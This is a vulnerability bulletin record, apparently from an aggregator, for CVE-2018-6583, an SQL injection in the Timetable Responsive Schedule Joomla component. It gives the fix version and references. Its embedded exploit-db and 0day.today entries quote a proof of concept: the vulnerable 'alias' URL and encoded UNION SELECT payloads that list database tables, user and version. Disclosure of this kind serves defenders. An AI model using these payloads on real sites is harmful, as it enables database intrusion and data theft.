ID JVEL:561
Type joomla
Reporter velteam
Modified 2018-02-23T18:38:25
Description
Timetable Responsive Schedule For Joomla by QuanticaLabs, versions 1.6 and earlier: SQL injection.
Resolution: update to version 1.7.
Update notice: https://codecanyon.net/item/timetable-responsive-schedule-for-joomla/9749539#item-description__updates
{"id": "JVEL:561", "hash": "4cb698ba2e48aecc1453e8c216ce1817", "type": "joomla", "bulletinFamily": "software", "title": "Timetable Responsive Schedule, 1.6, SQL injection", "description": "Timetable Responsive Schedule For Joomla by QuanticaLabs, versions 1.6. and previous, SQL injection\n\nResolution: update to 1.7\n\nupdate notice: https://codecanyon.net/item/timetable-responsive-schedule-for-joomla/9749539#item-description__updates\n", "published": "2018-02-23T00:00:00", "modified": "2018-02-23T18:38:25", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://vel.joomla.org/vel-blog/2087", "reporter": "velteam", "references": ["https://extensions.joomla.org/extension/timetable-responsive-schedule-for-joomla/", "https://codecanyon.net/item/timetable-responsive-schedule-for-joomla/9749539#item-description__updates", "http://codecanyon.net/user/QuanticaLabs/portfolio?ref=QuanticaLabs"], "cvelist": ["CVE-2018-6583"], "lastseen": "2018-09-18T08:45:46", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-09-18T08:45:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-6583"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146460"]}, {"type": "exploitdb", "idList": ["EDB-ID:44130"]}, {"type": "zdt", "idList": ["1337DAY-ID-29838"]}], "modified": "2018-09-18T08:45:46"}, "vulnersScore": 6.6}, "objectVersion": "1.4", "affectedSoftware": [{"name": "COM_TIMETABLE", "version": "1.6", "operator": "eq"}, {"name": "COM_TIMETABLE", "version": "1.7", "operator": "lt"}], "_object_type": "robots.models.jvel.JVELBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.jvel.JVELBulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:20:28", "bulletinFamily": "NVD", "description": "SQL Injection exists in the Timetable Responsive Schedule 1.5 component for Joomla! via a view=event&alias= request.", "modified": "2018-03-05T16:01:00", "id": "CVE-2018-6583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6583", "published": "2018-02-17T07:29:00", "title": "CVE-2018-6583", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-02-16T23:04:08", "bulletinFamily": "exploit", "description": "Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection. CVE-2018-6583. Webapps exploit for PHP platform. Tags: SQL Injection ...", "modified": "2018-02-16T00:00:00", "published": "2018-02-16T00:00:00", "id": "EDB-ID:44130", "href": "https://www.exploit-db.com/exploits/44130/", "type": "exploitdb", "title": "Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection", "sourceData": "# # # #\r\n# Exploit Title: Joomla! 
Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection\r\n# Dork: N/A\r\n# Date: 16.02.2018\r\n# Vendor Homepage: http://quanticalabs.com/joomla/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/\r\n# Version: 1.5\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6583\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL]\r\n# \r\n# LTYnKysvKiEwNzc3N1VOSU9OKi8oLyohMDc3NzdTRUxFQ1QqLzB4MjgzMTI5LCgvKiEwNzc3N1NFTEVDVCovKEB4KS8qITA3Nzc3RlJPTSovKC8qITA3Nzc3U0VMRUNUKi8oQHg6PTB4MDApLChATlI6PTApLCgvKiEwNzc3N1NFTEVDVCovKDApLyohMDc3NzdGUk9NKi8oSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUykvKiEwNzc3N1dIRVJFKi8oVEFCTEVfU0NIRU1BIT0weDY5NmU2NjZmNzI2ZDYxNzQ2OTZmNmU1ZjczNjM2ODY1NmQ2MSlBTkQoMHgwMClJTihAeDo9Q09OQ0FUKEB4LExQQUQoQE5SOj1ATlIlMmIxLDQsMHgzMCksMHgzYTIwLHRhYmxlX25hbWUsMHgzYzYyNzIzZSkpKSl4KSwweDI4MzMyOSwweDI4MzQyOSktLSst\r\n# \r\n# JTJkJTM2JTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTI5JTJkJTJkJTIwJTJk\r\n# \t\r\n# # # #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44130/"}], "packetstorm": [{"lastseen": "2018-02-17T17:02:53", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://packetstormsecurity.com/files/146460/Joomla-Timetable-Responsive-Schedule-For-Joomla-1.5-SQL-Injection.html", "id": "PACKETSTORM:146460", "title": 
"Joomla! Timetable Responsive Schedule For Joomla 1.5 SQL Injection", "type": "packetstorm", "sourceData": "`# # # # \n# Exploit Title: Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection \n# Dork: N/A \n# Date: 16.02.2018 \n# Vendor Homepage: http://quanticalabs.com/joomla/ \n# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/ \n# Version: 1.5 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-6583 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL] \n# \n# # # # \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/146460/joomlatimetablersfj15-sql.txt"}], "zdt": [{"lastseen": "2018-03-19T11:06:21", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-17T00:00:00", "published": "2018-02-17T00:00:00", "href": "https://0day.today/exploit/description/29838", "id": "1337DAY-ID-29838", "type": "zdt", "title": "Joomla Timetable Responsive Schedule For Joomla 1.5 Component - alias SQL Injection Vulnerability", "sourceData": "# # # #\r\n# Exploit Title: Joomla! 
Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection\r\n# Vendor Homepage: http://quanticalabs.com/joomla/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/\r\n# Version: 1.5\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-6583\r\n# # # #\r\n# Exploit Author: Ihsan Sencan \r\n# # # # \r\n# \r\n# POC:\r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL]\r\n# \r\n# LTYnKysvKiEwNzc3N1VOSU9OKi8oLyohMDc3NzdTRUxFQ1QqLzB4MjgzMTI5LCgvKiEwNzc3N1NFTEVDVCovKEB4KS8qITA3Nzc3RlJPTSovKC8qITA3Nzc3U0VMRUNUKi8oQHg6PTB4MDApLChATlI6PTApLCgvKiEwNzc3N1NFTEVDVCovKDApLyohMDc3NzdGUk9NKi8oSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUykvKiEwNzc3N1dIRVJFKi8oVEFCTEVfU0NIRU1BIT0weDY5NmU2NjZmNzI2ZDYxNzQ2OTZmNmU1ZjczNjM2ODY1NmQ2MSlBTkQoMHgwMClJTihAeDo9Q09OQ0FUKEB4LExQQUQoQE5SOj1ATlIlMmIxLDQsMHgzMCksMHgzYTIwLHRhYmxlX25hbWUsMHgzYzYyNzIzZSkpKSl4KSwweDI4MzMyOSwweDI4MzQyOSktLSst\r\n# \r\n# JTJkJTM2JTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTI5JTJkJTJkJTIwJTJk\r\n# \r\n# # # #\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/29838", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}